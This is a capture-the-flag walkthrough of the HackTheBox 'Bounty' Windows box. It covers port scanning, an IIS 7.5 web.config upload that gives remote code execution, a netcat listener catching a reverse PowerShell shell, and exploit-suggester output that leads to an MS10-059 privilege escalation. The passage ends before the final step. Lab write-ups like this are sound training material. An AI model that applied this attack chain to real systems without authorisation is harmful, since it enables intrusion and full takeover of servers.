Bounty is a Windows box with IP 10.10.10.93. It’s been a while since I did a windows box. This box taught me some important powershell one liners which can be used to upload strings and files.
Initial Analysis
Doing a basic port scan.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
┌──(kali㉿kali)-[~/HackTheBox/Bounty/10.10.10.93/nmap] └─$ cat Basic_10.10.10.93.nmap # Nmap 7.91 scan initiated Wed Feb 17 02:36:57 2021 as: nmap -Pn -sCV -p80 -oN nmap/Basic_10.10.10.93.nmap 10.10.10.93 Nmap scan report for 10.10.10.93 Host is up (0.33s latency).
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Bounty Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Feb 17 02:37:13 2021 -- 1 IP address (1 host up) scanned in 16.30 seconds
MS IIS 7.5, I have some previous experinece dealing with IIS servers, let’s add the service to the hosts.
I will be able to upload files to the server, nice. Is there any RCE based on file uploads in IIS 7.5? A quick search landed me into a blog post which shows that uploading a web.config file containg asp code can be used to execute remote commands.
Exploit
First setup will be to confirm if I will be able to upload a web.config file and check if RCE is possible. Once uploaded, the config file might be present in the uploadedfiles directory.
Yeah!! It works. Time to pop a reverese shell. I will be using powershell for this. Tried using different paylods, the implementation from nishang worked. Added a line to invoke the shell at the end.
┌──(kali㉿kali)-[~/HackTheBox/Bounty/exploit] └─$ nc -nvlp 4242 listening on [any] 4242 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.10.93] 49168 Windows PowerShell running as user BOUNTY$ on BOUNTY Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>cd C:\Users\merlin\Desktop PS C:\Users\merlin\Desktop> type user.txt
Owned user, Moving on to Root.
PrivEsc
Let’s get the system info and check it with the windows-exploit-suggester.
Host Name: BOUNTY OS Name: Microsoft Windows Server 2008 R2 Datacenter OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 55041-402-3606965-84760 Original Install Date: 5/30/2018, 12:22:24 AM System Boot Time: 3/27/2021, 9:51:36 AM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 2,047 MB Available Physical Memory: 1,676 MB Virtual Memory: Max Size: 4,095 MB Virtual Memory: Available: 3,369 MB Virtual Memory: In Use: 726 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP LogonServer: N/A Hotfix(s): N/A NetworkCard(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MTNetworkConnection ConnectionName: LocalAreaConnection DHCPEnabled: No IPaddress(es) [01]: 10.10.10.93
Checking with exploit suggester, got to know that we got multiple means to do privesc.
┌──(kali㉿kali)-[~/HackTheBox/Bounty/exploit] └─$ cat exploitsuggester.txt [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (ascii) [*] querying database file for potential vulnerabilities [*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits [*] there are now 197 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2008 R2 64-bit' [*] [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical [M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important [E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical [*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC [*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC [*] [E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important [M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important [M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical [E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important [E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important [M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical [M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
Trying out each exploit to check if any work, the MS10-059 worked. To upload the executable, I had to traverse to a directory which allowed creation of a file.
1 2
C:\Users\merlin\AppData\Local\Temp
Now let’s modify the config file to upload the file and save it to the above mentioned directory.